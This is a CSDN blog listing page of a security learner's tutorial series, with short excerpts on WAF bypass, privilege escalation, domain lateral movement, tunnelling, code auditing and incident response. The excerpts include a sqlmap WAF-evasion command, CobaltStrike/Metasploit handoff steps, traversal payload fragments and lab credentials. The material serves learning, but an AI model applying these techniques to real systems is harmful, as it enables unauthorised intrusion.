小佳男朋友的博客

私信 关注
小言安全
码龄2年

web渗透/Linux/网络基础/SQL/前端/后端/大数据/云计算

  • 16,898
    被访问量
  • 151
    原创文章
  • 71,524
    作者排名
  • 83
    粉丝数量
  • 于 2019-04-16 加入CSDN
获得成就
  • 获得9次点赞
  • 内容获得22次评论
  • 获得30次收藏
荣誉勋章
兴趣领域
  • #后端
    #C/C++
TA的专栏
  • kali潶客技术
    25篇
  • Linux
    31篇
  • XD安全
    76篇
  • Python基础
    20篇
  • 实战:靶场、真实站点、CTF等
    1篇
  • 渗透工具使用及环境搭建
    1篇
  • web安全/渗透
    2篇
  • C/C++
    4篇
  • 数据结构与算法
    1篇
  • 网络基础
    3篇
  • 最近
  • 文章
  • 资源
  • 问答
  • 课程
  • 帖子
  • 收藏
  • 关注/订阅

解决pip使用异常No module named ‘pip‘

在使用pip进行升级时提示:No module named ‘pip’解决方法:排除系统变量问题后,如果不是因为Python2和Python3版本的问题,可以在Windows下使用以下命令修复pippython -m ensurepip修复成功了,升级pip试试:python -m pip install --upgrade pip -i http://pypi.douban.com/simple --trusted-host pypi.douban.com问题解决!...
原创
38阅读
0评论
0点赞
发布博客于 2 月前

77 Python开发-批量Fofa&SRC提取&POC验证

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。Request爬虫技术,lxml数据提取,异常护理,Fofa等使用说明掌握利用公开或0day漏洞进行批量化的收集及验证脚本开发演示案例:➢ Python开发-某漏洞POC验证批量脚本➢ Python开发-Fofa搜索结果提取采集脚本➢ Python开发-教育SRC报告平台信息提取脚本涉及资源:https://fofa.so/https://src.sjtu.edu.cn
原创
80阅读
1评论
1点赞
发布博客于 2 月前

76 Python开发-内外网收集Socket&子域名&DNS

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#应急响应补充知识点挖矿靶机分析PDF外加其他#Python开发相关知识点:1.开发基础环境配置说明Windows10+Pycharm2.Python开发学习的意义学习相关安全工具原理掌握自定义工具及拓展开发解决实战中无工具或手工麻烦批量化等情况在二次开发Bypass,日常任务,批量测试利用等方面均有帮助如:SRC批量收集并利用,AWD批量利用获取FLAG,CTF加
原创
45阅读
0评论
1点赞
发布博客于 2 月前

75 应急响应-数据库&漏洞口令检索&应急取证箱

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。1.第三方应用由于是选择性安装,如何做好信息收集和漏洞探针也是获取攻击者思路的重要操作,除去本身漏洞外,提前预知或口令相关攻击也要进行筛选。2.排除三方应用攻击行为,自查漏洞分析攻击者思路,人工配合工具脚本3.由于工具或脚本更新迭代快,分类复杂,打造自己的工具箱迫在眉睫演示案例:➢ 系统日志-Win日志自动神器LogonTracer-外网内网日志➢ 应用分析-数据库Mysql
原创
56阅读
0评论
0点赞
发布博客于 2 月前

74 应急响应-win&linux分析后门&勒索病毒&攻击

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#操作系统(windows,linux)应急响应:1.常见危害:暴力破解,漏洞利用,流量攻击,木马控制(Webshell,PC木马等),病毒感染(挖矿,蠕虫,勒索等)。2.常见分析:计算机账户,端口,进程,网络,启动,服务,任务,文件等安全问题#常见日志类别及存储:Windows,Linux#补充资料:https://xz.aliyun.com/t/485https://
原创
47阅读
0评论
0点赞
发布博客于 2 月前

73 应急响应-WEB+日志分析php&javaweb&自动化工具

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#应急响应:保护阶段,分析阶段,复现阶段,修复阶段,建议阶段目的:分析出攻击时间,攻击操作,攻击后果,安全修复等并给出合理解决方案。#必备知识点:1.熟悉常见的WEB安全攻击技术2.熟悉相关日志启用及存储查看等3.熟悉日志中记录数据分类及分析等#准备工作:1.收集目标服务器各类信息2.部署相关分析软件及平台等3.整理相关安全渗透工具指纹库4.针对异常表现第一时间触
原创
17阅读
0评论
0点赞
发布博客于 2 月前

72 内网安全-域横向CS&MSF联动及应急响应初识

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。演示案例:➢ MSF&CobaltStrike联动ShellCS->MSF创建Foreign监听器->MSF监听模块设置对应地址端口->CS执行Spawn选择监听器MSF-CSCS创建监听器->MSF载入新模块注入设置对应地址端口->执行CS等待上线use exploit/windows/local/payload_inject➢
原创
37阅读
0评论
0点赞
发布博客于 2 月前

CobaltStrike4.0用户手册中文翻译.pdf

CobaltStrike4.0用户手册中文翻译.pdf
zip
发布资源于 2 月前

71 内网安全-域横向网络&传输&应用层隧道技术

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。必备知识点:1.代理和隧道技术区别?隧道可以理解为在代理上加了层绕过2.隧道技术为了解决什么?3.隧道技术前期的必备条件?在数据通信被拦截的情况下利用隧道技术封装改变通信协议进行绕过拦截CS、MSF无法上线,数据传输不稳定无回显,出口数据被监控,网络通信存在问题等在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对
原创
20阅读
0评论
0点赞
发布博客于 2 月前

70 内网安全-域横向内网漫游Socks代理隧道技术

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。必要基础知识点:1.内外网简单知识2.内网1和内网2通信问题3.正向反向协议通信连接问题4.内网穿透代理隧道技术说明演示案例:➢ 内网穿透Ngrok测试演示-两个内网通讯上线➢ 内网穿透Frp自建跳板测试-两个内网通讯上线➢ CFS三层内网漫游安全测试演练-某CTF线下2019#案例1-内网穿透Ngrok测试演示-两个内网通讯上线实验环境:两个不同的内网(有网络
原创
66阅读
1评论
0点赞
发布博客于 2 月前

69 内网安全-域横向CobaltStrike&SPN&RDP

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。演示案例:➢ 域横向移动RDP传递-Mimikatz➢ 域横向移动SPN服务-探针,请求,导出,破解,重写➢ 域横向移动测试流程一把梭哈-CobaltStrike初体验#案例1-域横向移动RDP传递-Mimikatz除了上述讲到的IPC,WMI,SMB等协议的链接外,获取到的明文密码或HASH密文也可以通过RDP协议进行链接操作。RDP协议连接:判断对方远程桌面服务是
原创
48阅读
1评论
0点赞
发布博客于 2 月前

68 内网安全-域横向PTH&PTK&PTT哈希票据传递

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。Kerberos协议具体工作方法,在域中,简要介绍一下:● 客户机将明文密码进行NTLM哈希,然后和时间戳一起加密(使用krbtgt密码hash作为密钥),发送给kdc(域控),kdc对用户进行检测,成功之后创建TGT(Ticket-Granting Ticket)● 将TGT进行加密签名返回给客户机器,只有域用户krbtgt才能读取kerberos中TGT数据● 然后客户机将
原创
50阅读
1评论
0点赞
发布博客于 2 月前

67 内网安全-域横向smb&wmi明文或hash传递

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#知识点1:Windows2012以上版本默认关闭wdigest,攻击者无法从内存中获取明文密码Windows2012以下版本如安装KB2871997补丁,同样也会导致无法获取明文密码针对以上情况,我们提供了4种方式解决此类问题1.利用哈希hash传递(pth,ptk等)进行移动2.利用其它服务协议(SMB,WMI等)进行哈希移动3.利用注册表操作开启Wdigest Aut
原创
44阅读
0评论
0点赞
发布博客于 2 月前

66 内网安全-域横向批量at&schtasks&impacket

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。2008 r2 webserver 域内web服务器本地管理员账号密码 : .\administraotr:admin!@#45当前机器域用户密码 : god\webadmin:admin!@#45-------------------------------------2003 x86 fileserver域内文件服务器本地管理员账号密码 : a
原创
36阅读
0评论
0点赞
发布博客于 2 月前

65 内网安全-域环境&工作组&局域网探针方案

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。演示案例:➢ 基本信息收集操作演示➢ 网络信息收集操作演示➢ 用户信息收集操作演示➢ 凭据信息收集操作演示➢ 探针主机域控架构服务操作演示#案例1-基本信息收集操作演示旨在了解当前服务器的计算机基本信息,为后续判断服务器角色,网络环境等做准备systeminfo 详细信息net start 启动服务tasklist 进程列表schtasks 计划任务#案例2
原创
27阅读
0评论
0点赞
发布博客于 2 月前

64 权限提升-Linux定时任务&环境变量&数据库

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。权限提升-linux提权手法总结演示案例:➢ Linux提权本地环境变量安全-Aliyun➢ Linux提权本地定时任务安全-Aliyun➢ Linux提权第三方服务数据库-Vulnhub➢ Linux提权提升漏洞查找关注点-拓展总结#案例1:Linux提权本地环境变量安全-Aliyun配合SUID进行环境变量提权-本地用户环境手写调用文件-编译-复制文件-增加环境变量
原创
36阅读
0评论
0点赞
发布博客于 2 月前

63 权限提升-Linux脏牛内核漏洞&SUID&信息收集

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#提权前信息收集知识点-参考打包的PDF:权限提升-linux提权手法总结演示案例:➢ Linux提权自动化脚本利用-4个脚本➢ Linux提权SUID配合脚本演示-Aliyun➢ Linux提权本地配合内核漏洞演示-Mozhe➢ Linux提权脏牛内核漏洞演示-Aliyun,Vulnhub#案例1-Linux提权自动化脚本利用-4个脚本两个信息收集:LinEnum,l
原创
39阅读
0评论
0点赞
发布博客于 2 月前

权限提升-linux提权手法总结

权限提升-linux提权手法总结
pdf
发布资源于 2 月前

62 权限提升-烂土豆&dll劫持&引号路径&服务权限

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。必备知识点:#令牌窃取配合烂土豆提权单纯令牌窃取:Web权限或本地提权如配合烂土豆提权:Web或数据库等权限#不带引号服务路径安全问题服务路径提权:Web权限或本地提权#不安全的服务权限配置问题服务权限配置:Web权限或本地提权(Web几率小)#补充说明:dll劫持提权及AlwaysInstallElevated等说明dll劫持提权需要特定软件应用的控制权限及启
原创
40阅读
0评论
0点赞
发布博客于 2 月前

61 权限提升-Redis&Postgre&令牌窃取&进程注入

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。  在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能。#数据库应用提权在权限提升中的意义#WEB或本地环境如何探针数据库应用#数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等演示案例:➢ Redis数据库权限
原创
65阅读
0评论
0点赞
发布博客于 2 月前

60 权限提升-MY&MS&ORA等SQL数据库提权

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。  在利用系统溢出漏洞无果的情况下,可以采用数据库进行提权,但需要知道数据库提权的前提条件:服务器开启数据库服务及获取到最高权限用户密码。除Access数据库外,其他数据库基本都存在数据库提权的可能。#数据库应用提权在权限提升中的意义#WEB或本地环境如何探针数据库应用#数据库提权权限用户密码收集等方法#目前数据库提权对应的技术及方法等演示案例:➢ Mysql数据库提权
原创
24阅读
0评论
0点赞
发布博客于 2 月前

59 权限提升-Win溢出漏洞及AT&SC&PS提权

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#明确权限提升基础知识:权限划分#明确权限提升环境问题:WEB及本地#明确权限提升方法针对:针对方法适应问题#明确权限提升针对版本:个人及服务器版本;针对方法;#知识点必备:用户及用户组权限划分;Windows提权命令演示案例:➢ 基于WEB环境下的权限提升-阿里云靶机(tool:传说中的草泥马4.0)➢ 基于本地环境下的权限提升-系统溢出漏洞➢ 基于本地环境下
原创
18阅读
0评论
0点赞
发布博客于 2 月前

58 权限提升-网站权限后台漏洞第三方获取

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#当前知识点在渗透流程中的点前面-中期-后期对应知识关系#当前知识点在权限提升的重点知识点顺序,理解思路,分类介绍等#当前知识点权限提升权限介绍注重理解当前权限对应可操作的事情#利用成功后的思想需要总结的思路相关的操作被拒绝无法实现的时候就会涉及到权限提升#具体有哪些权限需要我们知道和了解掌握的?后台权限,网站权限,数据库权限,接口权限,系统权限,域控权限等后台权
原创
40阅读
0评论
0点赞
发布博客于 2 月前

57 代码审计-JAVA项目框架类漏洞分析报告

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#知识点简称OGNL,对象导航图语言(Object Graph Navigation Language),是应用于Java中的一个开源的表达式语言(Expression Language),它被集成在Struts2等框架中,作用是对数据进行访问,它拥有类型转换、访问对象方法、操作集合对象等功能。Spring Expression Language(缩写为SpEL)是一种强大
原创
33阅读
0评论
0点赞
发布博客于 2 月前

56 代码审计-JAVA项目Filter过滤器及XSS挖掘

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#看构成,看指向,看配置,看代码-寻绕过演示案例:➢ Filter过滤器配置启用及查看➢ Demo代码测试引用过滤器测试➢ Jeesns过滤器分析绕过防护代码➢ Struts2框架类过滤器简要分析测试web.xml查看Filter过滤器名字,对应class,触发URL,生效规则等 Filter是JavaWeb中的过滤器,用于过滤URL请求。通过Filter我们可
原创
36阅读
0评论
0点赞
发布博客于 2 月前

55 代码审计-JAVA项目注入上传搜索或插件挖掘

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。必备知识点:简要理解JAVAWEB项目组成代码方面,框架方面,中间件容器方面等简要理解JAVAWEB执行流程参考下图及https://www.cnblogs.com/1987721594zy/p/9186584.htmlhttps://blog.csdn.net/weily11/article/details/80643472com:公司项目,copyright由
原创
82阅读
1评论
0点赞
发布博客于 2 月前

54 代码审计-TP5框架审计写法分析及代码追踪

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#知识点1调试,访问,路由,配置,版本等#知识点2自写写法,不安全写法,规则写法#知识点3调试模式信息获取对应结合入口路由配合对应项目断点调试执行跟着演示案例:➢ demo代码段自写和规则写分析➢ hsycms-TP框架-不安全写法-未过滤➢ weipan21-TP框架-规则写法-内置过滤涉及资源:https://github.com/Mochazz/T
原创
116阅读
0评论
0点赞
发布博客于 2 月前

53 代码审计-TP5框架及无框架变量覆盖反序列化

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#漏洞关键字:SQL注入:select insert update mysql_query mysqli等文件上传:$_FILES,type="file",上传,move_uploaded_file()等 XSS跨站:print print_r echo sprintf die var_dump var_export等文件包含:include include_once
原创
79阅读
0评论
0点赞
发布博客于 2 月前

52 代码审计-PHP项目类RCE及文件包含下载删除

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#漏洞关键字:SQL注入:select insert update mysql_query mysqli等文件上传:$_FILES,type="file",上传,move_uploaded_file()等 XSS跨站:print print_r echo sprintf die var_dump var_export等文件包含:include include_once
原创
31阅读
0评论
0点赞
发布博客于 2 月前

51 代码审计-PHP框架MVC类上传断点调试挖掘

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。知识点1:(beescms测试)#关键字搜索:(函数,键字,全局变量等)文件上传,$_FILES,move_uploaded_file等#应用功能抓包:(任何可能存在上传的应用功能点)前台会员中心,后台新闻添加等可能存在上传的地方知识点2:MVC开发框架类:https://www.cnblogs.com/wsybky/p/8638876.html知识点3:Thinkp
原创
34阅读
0评论
0点赞
发布博客于 2 月前

50 代码审计-PHP无框架项目SQL注入挖掘技巧

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#代码审计计划:审计项目漏洞Demo->审计思路->完整源码框架->验证并利用漏洞#代码审计内容:PHP,JAVA网站应用,引入框架类开发源码,相关审计工具及插件使用#代码审计必备知识点:环境安装搭建使用,相关工具插件安装使用,掌握前期各种漏洞原理及利用#代码审计开始前准备:审计目标的程序名,版本,当前环境(系统,中间件,脚本语言等信息),各种插件等
原创
64阅读
0评论
0点赞
发布博客于 2 月前

49 WAF绕过-漏洞利用之注入上传跨站等绕过

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#SQL注入如需sqlmap注入 修改us头及加入代理防CC拦截自写tamper模块安全狗:参考之前payloadAliyun:基本修改指纹即可宝塔:匹配关键字外加/*等sqlmap --proxy=“http://127.0.0.1:8080” --tamper=“waf.py” --random-agent#文件上传1.php 截断 参考前面上传waf绕过paylo
原创
26阅读
0评论
0点赞
发布博客于 2 月前

48 WAF绕过-权限控制之代码混淆及行为造轮子

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#Safedog代码层手写及脚本绕过变量覆盖,加密混淆,异或生成#BT Aliyun代码层手写及脚本绕过编码解码(变量覆盖,加密混淆,异或生成)ASP,PHP,ASPX,JSP,PY等后门免杀同理http://test.xxx.com/x.php?id=xmr6=cGhwaW5mbygpOw==http://test.xxx.com/xx.php?x=b&
原创
31阅读
0评论
0点赞
发布博客于 2 月前

47 WAF绕过-漏洞发现之代理池指纹被动探针

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#漏洞发现触发WAF点-针对xray,awvs等1.扫描速度-(代理池,延迟,白名单等)2.工具指纹-(特征修改,伪造模拟真实用户等)3.漏洞Payload-(数据变异,数据加密,白名单等)案例演示:➢ 代理池Proxy_pool项目搭建及使用解释➢ 充钱代理池直接干safedog+BT+Aliyun探针➢ Safedog-awvs漏扫注入测试绕过-延时,白名单➢ Al
原创
40阅读
0评论
0点赞
发布博客于 2 月前

46 WAF绕过-信息收集之反爬虫延时代理池技术

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。演示案例:➢ Safedog-默认拦截机制分析绕过-未开CC➢ Safedog-默认拦截机制分析绕过-开启CC➢ Aliyun_os-默认拦截机制分析绕过-简要界面➢ BT(防火墙插件)-默认拦截机制分析绕过-简要界面涉及资源:https://www.bt.cn/http://free.safedog.cn/website_safedog.htmlhttps://www
原创
115阅读
0评论
0点赞
发布博客于 2 月前

45 漏洞发现-API接口服务之漏洞探针类型利用修复

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#端口服务类安全测试根据前期信息收集针对目标端口服务类探针后进行的安全测试,主要涉及攻击方法:口令安全,WEB类漏洞,版本漏洞等,其中产生的危害可大可小。属于端口服务/第三方服务类安全测试面。一般在已知应用无思路的情况下选用的安全测试方案。#API接口-WebService RESTful APIhttps://xz.aliyun.com/t/2412根据应用自身的功能方向决定
原创
54阅读
0评论
0点赞
发布博客于 2 月前

44 漏洞发现-APP应用之漏洞探针类型利用修复

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#思路说明:反编译提取URL或抓包获取URL,进行WEB应用测试,如不存在或走其他协议的情况下,需采用网络接口抓包进行数据获取,转至其他协议安全测试!#APP->WEB APP->其他 APP->逆向#WEB抓包,其他协议抓包演示及说明#未逆向层面进行抓包区分各协议测试#逆向层面进行提取APK代码层面数据#https://www.cnblogs.com/L
原创
24阅读
0评论
0点赞
发布博客于 2 月前

43 漏洞发现-WEB应用之漏洞探针类型利用修复

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。根据对方的cms信息用思维导图中的工具框架进行扫描,效果可能会更好一些,知道的话直接网上搜i对应的漏洞。#已知CMS如常见的dedecms.discuz,wordpress等源码结构,这种一般采用非框架类开发,但也有少部分采用的是框架类开发,针对此类源码程序的安全检测,我们要利用公开的漏洞进行测试,如不存在可采用白盒代码审计自行挖掘。#开发框架如常见的thinkphp,spri
原创
35阅读
1评论
0点赞
发布博客于 2 月前

42 漏洞发现-操作系统之漏洞探针类型利用修复

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#相关名词解释:CVSS,CVE,EXP,POC等->exp:利用 poc:验证https://blog.csdn.net/qq_38055050/article/details/80214684#漏洞发现-操作系统之漏洞探针类型利用修复角色扮演:操作系统权限的获取会造成服务器上安全问题漏扫工具:Goby,Nmap,Nessus,Openvas,Nexpose等漏洞
原创
138阅读
0评论
0点赞
发布博客于 2 月前

41 JAVA安全-目录遍历访问控制XSS等安全问题

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#文件上传配合目录遍历 覆盖文件自定义文件存储地址-基于用户名存储问题#代码解析及框架源码追踪:第一关:Payload: …/x第二关:Payload: …//x#不安全登录Insecure Login-基于前端认证#熟悉代码结构及硕源代码文件#访问控制对象-逻辑越权#代码分析过关逻辑枚举用户参数对应数据库的其他数据信息role,userid通过参数值构造URL
原创
33阅读
0评论
0点赞
发布博客于 2 月前

40 JAVA安全-JWT安全及预编译CASE注入等

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: 通过前期的WEB漏洞的学习,掌握了大部分的安全漏洞的原理及利用,但在各种脚本语言开发环境的差异下,会存在新的安全问题,其中脚本语言类型PHP,Java,Python等主流开发框架会有所差异。什么是JWT?JSON Web Token(JSON Web令牌)是一种跨域验证身份的方案。JWT不加密传输的数据,但能够通过数字签名来验证数据未被篡改(但是做完下面的WebGo
原创
22阅读
0评论
0点赞
发布博客于 2 月前

CTF-Vulnhub-XXE安全真题复现-检测,利用,拓展,实战

靶场网址:https://www.vulnhub.com/?q=xxe靶场环境下载:https://download.vulnhub.com/xxe/XXE.zip1.利用nmap扫出目标靶机ip等信息靶场环境下载、解压并安装后,并不知道靶机的账号和密码信息,因为和kali主机是在同一网段,那么可以考虑用nmap知道靶机的ip和其他信息,结果如下:2.提取关键信息并利用直接访问网页xxe目录(有登录信息)随便输账号密码bp抓包可知为xml数据格式,接下来对它进行攻击读取xxe.p
原创
43阅读
0评论
1点赞
发布博客于 2 月前

39 WEB漏洞-XXE&XML之利用检测绕过全解

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。  XML被设计为传输和存储数据,XML文档结构包括XML声明、DTD文档类型定义(可选)、文档元素,其焦点是数据的内容,其把数据从HTML分离,是独立于软件和硬件的信息传输工具。XXE漏洞全称XML External Entity Injection,即xml外部实体注入漏洞,XXE漏洞发生在应用程序解析XML输入时,没有禁止外部实体的加载,导致可加载恶意外部文件,造成文件读取、命令
原创
56阅读
1评论
0点赞
发布博客于 2 月前

38 WEB漏洞-反序列化之PHP&JAVA全解(下)

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#序列化和反序列化序列化 (Serialization):将对象的状态信息转换为可以存储或传输的形式的过程。在序列化期间,对象将其当前状态写入到临时或持久性存储区。反序列化:从存储区中读取该数据,并将其还原为对象的过程,称为反序列化。演示案例:➢ Java反序列化及命令执行代码测试➢ WebGoat_Javaweb靶场反序列化测试java -Dhibernate5 -cp
原创
86阅读
0评论
0点赞
发布博客于 2 月前

37 WEB漏洞-反序列化之PHP&JAVA全解(上)

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#PHP反序列化原理:未对用户输入的序列化字符串进行检测,导致攻击者可以控制反序列化过程,从而导致代码执行,SQL注入,目录遍历等不可控后果。在反序列化的过程中自动触发了某些魔术方法。当进行反序列化的时候就有可能会触发对象中的一些魔术方法。serialize() //将一个对象转换成一个字符串unserialize() //将字符串还原成一个对象触发:unseri
原创
21阅读
0评论
0点赞
发布博客于 2 月前

36 WEB漏洞-逻辑越权之验证码与Token及接口

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#验证码安全分类:图片,手机或邮箱,语音,视频,操作等原理:验证生成或验证过程中的逻辑问题危害:账户权限泄漏,短信轰炸,遍历,任意用户操作等漏洞:客户端回显,验证码复用,验证码爆破,绕过等#token安全基本上述同理,主要是验证中可存在绕过可继续后续测试token爆破,token客户端回显等#验证码识别插件工具使用captcha-killer,Pkav_Http_
原创
353阅读
0评论
0点赞
发布博客于 2 月前

34 WEB漏洞-逻辑越权之支付数据篡改安全

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#登录应用功能点安全问题检测功能点,检测,危害,修复方案等1.登录点暴力破解2.HTTP/HTTPS传输3.Cookie脆弱点验证4.Session固定点测试5.验证密文比对安全测试#数据篡改安全问题原理,检测,危害,修复等参考:https://www.secpulse.com/archives/67080.html#商品购买流程:选择商品和数量-选择支付及配送方
原创
122阅读
0评论
0点赞
发布博客于 2 月前

33 WEB漏洞-逻辑越权之水平垂直越权全解

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#水平,垂直越权,未授权访问解释,原理,检测,利用,防御等通过更换的某个ID之类的身份标识,从而使A账号获取(修改、删除等)B账号数据。使用低权限身份的账号,发送高权限账号才能有的请求,获得其高权限的操作。通过删除请求中的认证信息后重放该请求,依旧可以访问或者完成操作。原理:前端安全造成:界面判断用户等级后,代码界面部分进行可选显示后盾安全造成:数据库user表(管理
原创
212阅读
0评论
0点赞
发布博客于 2 月前

32 WEB漏洞-文件操作之文件下载读取全解

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#文件下载,读取原理,检测,利用,修复等#利用数据库配置文件下载或读取后续接口密匙信息文件下载或读取后续#文件名,参数值,目录符号read.xxx?filename=down.xxx?filename=readfile.xxx?file=downfile.xxx?file=…/ …\ .\ ./等%00 ? %23 %20 .等&readpath=、&a
原创
26阅读
0评论
0点赞
发布博客于 2 月前

31 WEB漏洞-文件操作之文件包含漏洞全解

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#文件包含漏洞原理,检测,类型,利用,修复等#文件包含各个脚本代码ASP,PHP,JSP,ASPX等<!--#include file="1.asp" --><!--#include file="top.aspx" --><c:import url="http://thief.one/1.jsp"><jsp:include pag
原创
29阅读
0评论
0点赞
发布博客于 2 月前

30 WEB漏洞-RCE代码及命令执行漏洞全解

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。前言: 在Web应用中有时候程序员为了考虑灵活性、简洁性,会在代码调用代码或命令执行函数去处理。比如当应用在调用一些能将字符串转化成代码的函数时,没有考虑用户是否能控制这个字符串,将造成代码执行漏洞。同样调用系统命令处理,将造成命令执行漏洞。#代码执行RCE漏洞原理,攻击,检测,危害,修复等#命令执行RCE漏洞原理,攻击,检测,危害,修复等#RCE漏洞产生相关性函数演示案例
原创
39阅读
0评论
0点赞
发布博客于 2 月前

29 WEB漏洞-CSRF及SSRF漏洞案例讲解

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#CSRF漏洞解释,原理等#CSRF漏洞检测,案例,防御等#防御方案1、当用户发送重要的请求时需要输入原始密码2、设置随机Token3、检验referer来源,请求时判断请求链接是否为当前管理员正在使用的页面(管理员在编辑文章,黑客发来恶意的修改密码链接,因为修改密码页面管理员并没有在操作,所以攻击失败)4、设置验证码5、限制请求方式只能为POST#SSRF漏洞解释
原创
43阅读
1评论
0点赞
发布博客于 2 月前

28 WEB漏洞-XSS跨站之WAF绕过及安全修复

免责声明: 内容仅用于技术研究,禁止使用文章中的技术进行非法行为,如利用文章中技术进行非法行为造成的后果与本文作者无关。#常规WAF绕过思路标签语法替换特殊符号干扰提交方式更改垃圾数据溢出加密解密算法结合其他漏洞绕过#自动化工具说明:https://github.com/s0md3v/XSStrikeXSStrike主要特点反射和 DOM XSS 扫描多线程爬虫Context分析可配置的核心检测和规避 WAF老旧的 JS 库扫描智能payload生成器手工制作的 HTML
原创
43阅读
1评论
0点赞
发布博客于 2 月前

27 WEB漏洞-XSS跨站之代码及httponly绕过

